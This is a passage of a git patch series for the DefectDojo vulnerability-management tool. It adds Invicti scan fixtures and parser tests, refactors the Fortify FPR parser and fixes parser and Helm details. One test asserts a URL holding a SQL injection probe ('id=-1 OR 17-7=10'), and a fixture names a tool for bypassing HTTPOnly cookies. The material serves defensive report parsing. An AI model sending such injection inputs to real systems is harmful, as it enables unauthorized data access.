Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as HTTPOnly.

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes, JavaScript code will not be able to read cookies.)
    ", + "ExploitationSkills": "", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/invicti/issue_9816.json b/unittests/scans/invicti/issue_9816.json new file mode 100644 index 00000000000..14f7d156381 --- /dev/null +++ b/unittests/scans/invicti/issue_9816.json @@ -0,0 +1,173 @@ +{ + "Generated": "03/02/2019 15:50:29 (UTC-06:00)", + "Target": { + "ScanId": "fg49hk5", + "Url": "https://www.sampleweb.org/", + "Initiated": "03/02/2019 15:48:23 (UTC-06:00)", + "Duration": "00:01:20.4322725" + }, + "Vulnerabilities": [ + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsSecure", + "Name": "Cookie Not Marked as Secure", + "Severity": "High", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A6", + "Owasp2017": "A3", + "Wasc": "15", + "Cwe": "614", + "Capec": "102", + "Pci31": "6.5.10", + "Pci32": "6.5.10", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.

    This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

    ", + "Impact": "
    This cookie will be transmitted over an HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
    ", + "ExploitationSkills": "
    To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
    ", + "RemedialProcedure": "
    Mark all cookies used within the application as secure.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "BootstrapjsOutOfDate", + "Name": "Out-of-date Version (Bootstrap)", + "Severity": "Medium", + "Certainty": 90, + "Confirmed": false, + "Classification": { + "Owasp": "A9", + "Owasp2017": "A9", + "Wasc": null, + "Cwe": null, + "Capec": "310", + "Pci31": "6.2", + "Pci32": "6.2", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "4.0.0" + }, + { + "Name": "Latest Version", + "Value": "4.3.1" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 3/1/2019 vulnerability database content." + } + ], + "KnownVulnerabilities": [ + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + } + ], + "Description": "

    Netsparker identified that the target web site is using Bootstrap and detected that it is out of date.

    ", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "RemedialActions": "", + "ExploitationSkills": "", + "RemedialProcedure": "
    Please upgrade your installation of Bootstrap to the latest stable version.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsHttpOnly", + "Name": "Cookie Not Marked as HttpOnly", + "Severity": "Low", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A5", + "Owasp2017": "A6", + "Wasc": "15", + "Cwe": "16", + "Capec": "107", + "Pci31": null, + "Pci32": null, + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as HTTPOnly.

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes, JavaScript code will not be able to read cookies.)
    ", + "ExploitationSkills": "", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + } + ] +} \ No newline at end of file diff --git a/unittests/tools/test_invicti_parser.py b/unittests/tools/test_invicti_parser.py new file mode 100644 index 00000000000..aca5bfadd78 --- /dev/null +++ b/unittests/tools/test_invicti_parser.py @@ -0,0 +1,98 @@ +from dojo.models import Test +from dojo.tools.invicti.parser import InvictiParser +from unittests.dojo_test_case import DojoTestCase + + +class TestInvictiParser(DojoTestCase): + + def test_parse_file_with_one_finding(self): + with open("unittests/scans/invicti/invicti_one_finding.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("Medium", finding.severity) + self.assertEqual(16, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/auth/login.php") + + def test_parse_file_with_multiple_finding(self): + with open("unittests/scans/invicti/invicti_many_findings.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(16, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("Medium", finding.severity) + self.assertEqual(16, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/auth/login.php") + + with self.subTest(i=1): + finding = findings[1] + self.assertEqual("Critical", finding.severity) + self.assertEqual(89, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7=10") + + with self.subTest(i=2): + finding = findings[2] + self.assertEqual("Medium", finding.severity) + self.assertEqual(205, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com") + + def test_parse_file_issue_9816(self): + with 
open("unittests/scans/invicti/issue_9816.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("High", finding.severity) + self.assertEqual(614, finding.cwe) + self.assertEqual("03/02/2019", finding.date.strftime("%d/%m/%Y")) + + def test_parse_file_issue_10311(self): + with open("unittests/scans/invicti/issue_10311.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("High", finding.severity) + self.assertEqual(614, finding.cwe) + self.assertEqual("03/02/2019", finding.date.strftime("%d/%m/%Y")) From fa4ed047e563cc1c929d83858bc3027701f2b52e Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:33:24 -0500 Subject: [PATCH 12/62] Fortify Parser: Fortification of the the FPR parsing (#10901) * Fortify Parser: Fortification of the the FPR parsing * Update dojo/tools/fortify/parser.py Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- dojo/tools/fortify/fpr_parser.py | 203 ++++++++++++++++++++++--------- dojo/tools/fortify/parser.py | 3 + 2 files changed, 148 insertions(+), 58 deletions(-) diff --git a/dojo/tools/fortify/fpr_parser.py b/dojo/tools/fortify/fpr_parser.py index d0d62e2aa92..a5a11051356 100644 --- a/dojo/tools/fortify/fpr_parser.py +++ b/dojo/tools/fortify/fpr_parser.py @@ -1,9 +1,10 @@ import re import zipfile +from xml.etree.ElementTree import Element from defusedxml import ElementTree -from dojo.models import Finding +from dojo.models import Finding, Test class FortifyFPRParser: @@ -12,70 +13,156 @@ def parse_fpr(self, filename, test): input_zip = zipfile.ZipFile(filename.name, "r") else: input_zip = zipfile.ZipFile(filename, "r") - zipdata = {name: input_zip.read(name) for name in input_zip.namelist()} - root = ElementTree.fromstring(zipdata["audit.fvdl"].decode("utf-8")) + # Read each file from the zip artifact into a dict with the format of + # filename: file_content + zip_data = {name: input_zip.read(name) for name in input_zip.namelist()} + root = self.identify_root(zip_data) + return self.parse_vulnerabilities_and_convert_to_findings(root, test) + + def identify_root(self, zip_data: dict) -> Element: + """Iterate through the zip data to determine which file in the zip could be the XMl to be parsed.""" + # Determine where the "audit.fvdl" could be + audit_file = None + for file_name in zip_data: + if file_name.endswith("audit.fvdl"): + audit_file = file_name + break + # Make sure we have an audit file + if audit_file is None: + msg = 'A search for an "audit.fvdl" file was not successful. 
' + raise ValueError(msg) + # Parser the XML file and determine the name space, if present + root = ElementTree.fromstring(zip_data.get(audit_file).decode("utf-8")) + self.identify_namespace(root) + return root + + def identify_namespace(self, root: Element) -> None: + """Determine what the namespace could be, and then set the value in a class var labeled `namespace`""" regex = r"{.*}" matches = re.match(regex, root.tag) try: - namespace = matches.group(0) + self.namespace = matches.group(0) except BaseException: - namespace = "" + self.namespace = "" + + def parse_vulnerabilities_and_convert_to_findings(self, root: Element, test: Test) -> list[Finding]: + """Parse the XML and generate a list of findings.""" items = [] for child in root: if "Vulnerabilities" in child.tag: for vuln in child: - ClassID = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}ClassID").text - Kingdom = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}Kingdom").text - Type = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}Type").text - AnalyzerName = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}AnalyzerName").text - DefaultSeverity = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}DefaultSeverity").text - InstanceID = vuln.find(f"{namespace}InstanceInfo").find(f"{namespace}InstanceID").text - InstanceSeverity = vuln.find(f"{namespace}InstanceInfo").find(f"{namespace}InstanceSeverity").text - Confidence = vuln.find(f"{namespace}InstanceInfo").find(f"{namespace}Confidence").text - SourceLocationpath = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("path") - SourceLocationline = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("line") - SourceLocationlineEnd = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("lineEnd") - SourceLocationcolStart = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("colStart") - SourceLocationcolEnd = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("colEnd") - SourceLocationsnippet = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("snippet") - description = Type + "\n" - severity = self.fpr_severity(Confidence, InstanceSeverity) - description += "**ClassID:** " + ClassID + "\n" - description += "**Kingdom:** " + Kingdom + "\n" - description += "**AnalyzerName:** " + AnalyzerName + "\n" - description += "**DefaultSeverity:** " + DefaultSeverity + "\n" - description += "**InstanceID:** " + InstanceID + "\n" - description += "**InstanceSeverity:** " + InstanceSeverity + "\n" - description += "**Confidence:** " + Confidence + "\n" - description += "**SourceLocationpath:** " + 
str(SourceLocationpath) + "\n" - description += "**SourceLocationline:** " + str(SourceLocationline) + "\n" - description += "**SourceLocationlineEnd:** " + str(SourceLocationlineEnd) + "\n" - description += "**SourceLocationcolStart:** " + str(SourceLocationcolStart) + "\n" - description += "**SourceLocationcolEnd:** " + str(SourceLocationcolEnd) + "\n" - description += "**SourceLocationsnippet:** " + str(SourceLocationsnippet) + "\n" - items.append( - Finding( - title=Type + " " + ClassID, - severity=severity, - static_finding=True, - test=test, - description=description, - unique_id_from_tool=ClassID, - file_path=SourceLocationpath, - line=SourceLocationline, - ), - ) + finding_context = { + "title": "", + "description": "", + "static_finding": True, + "test": test, + } + self.parse_class_information(vuln, finding_context) + self.parse_instance_information(vuln, finding_context) + self.parse_analysis_information(vuln, finding_context) + self.parse_severity_and_convert(vuln, finding_context) + items.append(Finding(**finding_context)) return items - def fpr_severity(self, Confidence, InstanceSeverity): - if float(Confidence) >= 2.5 and float(InstanceSeverity) >= 2.5: - severity = "Critical" - elif float(Confidence) >= 2.5 and float(InstanceSeverity) < 2.5: - severity = "High" - elif float(Confidence) < 2.5 and float(InstanceSeverity) >= 2.5: - severity = "Medium" - elif float(Confidence) < 2.5 and float(InstanceSeverity) < 2.5: - severity = "Low" - else: - severity = "Info" - return severity + def parse_severity_and_convert(self, vulnerability: Element, finding_context: dict) -> None: + """Convert the the float representation of severity and confidence to a string severity.""" + # Default info severity in the case of an error + severity = "Info" + instance_severity = None + confidence = None + # Attempt to fetch the confidence and instance severity + if (instance_info := vulnerability.find(f"{self.namespace}InstanceInfo")) is not None: + instance_severity = getattr(instance_info.find(f"{self.namespace}InstanceSeverity"), "text", None) + confidence = getattr(instance_info.find(f"{self.namespace}Confidence"), "text", None) + # Make sure we have something to work with + if confidence is not None and instance_severity is not None: + if float(confidence) >= 2.5 and float(instance_severity) >= 2.5: + severity = "Critical" + elif float(confidence) >= 2.5 and float(instance_severity) < 2.5: + severity = "High" + elif float(confidence) < 2.5 and float(instance_severity) >= 2.5: + severity = "Medium" + elif float(confidence) < 2.5 and float(instance_severity) < 2.5: + severity = "Low" + # Return either info, or the calculated severity + finding_context["severity"] = severity + + def parse_class_information(self, vulnerability: Element, finding_context: dict) -> None: + """Appends the description with any class information that can be extracted.""" + if (class_info := vulnerability.find(f"{self.namespace}ClassInfo")) is not None: + if (namespace_type := class_info.find(f"{self.namespace}Type")) is not None: + finding_context["description"] += f"{namespace_type.text}\n" + finding_context["title"] += f"{namespace_type.text}" + if (class_id := class_info.find(f"{self.namespace}ClassID")) is not None: + finding_context["description"] += f"**ClassID:** {class_id.text}\n" + finding_context["unique_id_from_tool"] = class_id.text + finding_context["title"] += f" {class_id.text}" + if (kingdom := class_info.find(f"{self.namespace}Kingdom")) is not None: + finding_context["description"] += f"**Kingdom:** 
{kingdom.text}\n" + if (analyzer_name := class_info.find(f"{self.namespace}AnalyzerName")) is not None: + finding_context["description"] += f"**AnalyzerName:** {analyzer_name.text}\n" + if (default_severity := class_info.find(f"{self.namespace}DefaultSeverity")) is not None: + finding_context["description"] += f"**DefaultSeverity:** {default_severity.text}\n" + + def parse_instance_information(self, vulnerability: Element, finding_context: dict) -> None: + """Appends the description with any instance information that can be extracted.""" + if (instance_info := vulnerability.find(f"{self.namespace}InstanceInfo")) is not None: + if (instance_id := instance_info.find(f"{self.namespace}InstanceID")) is not None: + finding_context["description"] += f"**InstanceID:** {instance_id.text}\n" + if (instance_severity := instance_info.find(f"{self.namespace}InstanceSeverity")) is not None: + finding_context["description"] += f"**InstanceSeverity:** {instance_severity.text}\n" + if (confidence := instance_info.find(f"{self.namespace}Confidence")) is not None: + finding_context["description"] += f"**Confidence:** {confidence.text}\n" + + def parse_analysis_information(self, vulnerability: Element, finding_context: dict) -> None: + """Appends the description with any analysis information that can be extracted.""" + if (analysis_info := vulnerability.find(f"{self.namespace}AnalysisInfo")) is not None: + # See if we can get a SourceLocation from this + if (source_location := self.get_source_location(analysis_info)) is not None: + path = source_location.attrib.get("path") + line = source_location.attrib.get("line") + # Managed the description + finding_context["description"] += f"**SourceLocationPath:** {path}\n" + finding_context["description"] += f"**SourceLocationLine:** {line}\n" + finding_context["description"] += ( + f"**SourceLocationLineEnd:** {source_location.attrib.get('lineEnd')}\n" + ) + finding_context["description"] += ( + f"**SourceLocationColStart:** {source_location.attrib.get('colStart')}\n" + ) + finding_context["description"] += f"**SourceLocationColEnd:** {source_location.attrib.get('colEnd')}\n" + finding_context["description"] += ( + f"**SourceLocationSnippet:** {source_location.attrib.get('snippet')}\n" + ) + # manage the other metadata + finding_context["file_path"] = path + finding_context["line"] = line + + def get_source_location(self, analysis_info: Element) -> Element | None: + """Return the SourceLocation element if we are able to reach it.""" + # The order of this list is very important. Do not reorder it! 
+ key_path = [
+ "Unified",
+ "Trace",
+ "Primary",
+ "Entry",
+ "Node",
+ "SourceLocation",
+ ]
+ # Iterate over the keys until we find something that cannot be fulfilled
+ current_element = analysis_info
+ # Traverse the key path up to "Entry" to fetch all Entry elements
+ for key in key_path[:-3]: # stop before "Entry" level
+ if (next_current_element := current_element.find(f"{self.namespace}{key}")) is not None:
+ current_element = next_current_element
+ else:
+ return None
+ # Iterate over all "Entry" elements
+ entries = current_element.findall(f"{self.namespace}Entry")
+ for entry in entries:
+ # Continue the search for "Node" and "SourceLocation" within each entry
+ if (node := entry.find(f"{self.namespace}Node")) is not None:
+ if (source_location := node.find(f"{self.namespace}SourceLocation")) is not None:
+ return source_location
+ # Return None if no SourceLocation was found in any Entry
+ return None
diff --git a/dojo/tools/fortify/parser.py b/dojo/tools/fortify/parser.py
index 2b1f3e21e3d..b6f7e5185c8 100644
--- a/dojo/tools/fortify/parser.py
+++ b/dojo/tools/fortify/parser.py
@@ -17,3 +17,6 @@ def get_findings(self, filename, test):
 return FortifyXMLParser().parse_xml(filename, test)
 elif str(filename.name).endswith(".fpr"):
 return FortifyFPRParser().parse_fpr(filename, test)
+ else:
+ msg = "Filename extension not recognized. Use .xml or .fpr"
+ raise ValueError(msg)

From 5b25e16cf9bc9d7a027906432370089230f2a273 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81ngel=20Riveira?= <61965217+arivra@users.noreply.github.com>
Date: Mon, 16 Sep 2024 04:24:36 +0200
Subject: [PATCH 13/62] manage not defined metadata in mitigations and add assumptions comments (#10897)

---
 dojo/tools/threat_composer/parser.py | 21 +++++++++++++------
 .../threat_composer_many_threats.json | 9 ++------
 2 files changed, 17 insertions(+), 13 deletions(-)

diff --git a/dojo/tools/threat_composer/parser.py b/dojo/tools/threat_composer/parser.py
index 1babba06fd2..f1099641b07 100644
--- a/dojo/tools/threat_composer/parser.py
+++ b/dojo/tools/threat_composer/parser.py
@@ -70,12 +70,12 @@ def get_findings(self, file, test):
 if "threatAction" in threat:
 title = threat["threatAction"]
- severity, impact, comments = self.parse_threat_metadata(threat["metadata"])
+ severity, impact, comments = self.parse_threat_metadata(threat.get("metadata", []))
 description = self.to_description_text(threat, comments, assumption_threat_links[threat["id"]])
 mitigation = self.to_mitigation_text(mitigation_links[threat["id"]])
 unique_id_from_tool = threat["id"]
 vuln_id_from_tool = threat["numericId"]
- tags = threat["tags"] if "tags" in threat else []
+ tags = threat.get("tags", [])

 finding = Finding(
 title=title,
@@ -112,14 +112,12 @@ def to_mitigation_text(self, mitigations):
 counti = i + 1
 text += f"**Mitigation {counti} (ID: {mitigation['numericId']}, Status: {mitigation.get('status', 'Not defined')})**: {mitigation['content']}"
- for item in mitigation["metadata"]:
+ for item in mitigation.get("metadata", []):
 if item["key"] == "Comments":
 text += f"\n*Comments*: {item['value'].replace(linesep, ' ')} "
 break
- for j, assumption in enumerate(assumption_links):
- countj = j + 1
- text += f"\n- *Assumption {countj} (ID: {assumption['numericId']})*: {assumption['content'].replace(linesep, ' ')}"
+ text += self.to_assumption_text(assumption_links)

 text += "\n"
@@ -145,8 +143,19 @@ def to_description_text(self, threat, comments, assumption_links):
 if comments:
 text += f"\n*Comments*: {comments}"

+ text += self.to_assumption_text(assumption_links)
+
+ return text
+
+ def to_assumption_text(self, assumption_links):
+ text = ""
 for i, assumption in enumerate(assumption_links):
 counti = i + 1
 text += f"\n- *Assumption {counti} (ID: {assumption['numericId']})*: {assumption['content'].replace(linesep, ' ')}"
+ for item in assumption.get("metadata", []):
+ if item["key"] == "Comments":
+ text += f"\n  *Comments*: {item['value'].replace(linesep, ' ')} "
+ break
+
 return text
diff --git a/unittests/scans/threat_composer/threat_composer_many_threats.json b/unittests/scans/threat_composer/threat_composer_many_threats.json
index cb61d880bde..6af441362e3 100644
--- a/unittests/scans/threat_composer/threat_composer_many_threats.json
+++ b/unittests/scans/threat_composer/threat_composer_many_threats.json
@@ -94,13 +94,8 @@
 "tags": [
 "lorem ipsum"
 ],
- "metadata": [
- {
- "key": "Comments",
- "value": "lorem ipsum"
- }
- ],
- "displayOrder": 21
+ "displayOrder": 21,
+ "status": "mitigationResolved"
 },
 {
 "id": "11fb1c71-42f0-4004-89a7-09d8bf6f8b11",

From e9824dca5f6d05cc4cf249cda9219d0b29f083b8 Mon Sep 17 00:00:00 2001
From: Vladimir Shelkovnikov <99356504+C4tWithShell@users.noreply.github.com>
Date: Mon, 16 Sep 2024 05:25:02 +0300
Subject: [PATCH 14/62] Fix typo in ingress policy (#10898)

---
 helm/defectdojo/templates/network-policy.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/helm/defectdojo/templates/network-policy.yaml b/helm/defectdojo/templates/network-policy.yaml
index 251128004e9..80c55ddcfa3 100644
--- a/helm/defectdojo/templates/network-policy.yaml
+++ b/helm/defectdojo/templates/network-policy.yaml
@@ -13,7 +13,7 @@ spec:
 podSelector:
 matchLabels:
 app.kubernetes.io/instance: {{ .Release.Name }}
- {{- if .Value.networkPolicy.ingress}}
+ {{- if .Values.networkPolicy.ingress}}
 ingress:
 {{- toYaml .Values.networkPolicy.ingress | nindent 4 }}
 {{- else }}

From 0da81c6091b512052f0358d91ac33803cf755624 Mon Sep 17 00:00:00 2001
From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com>
Date: Sun, 15 Sep 2024 21:39:35 -0500
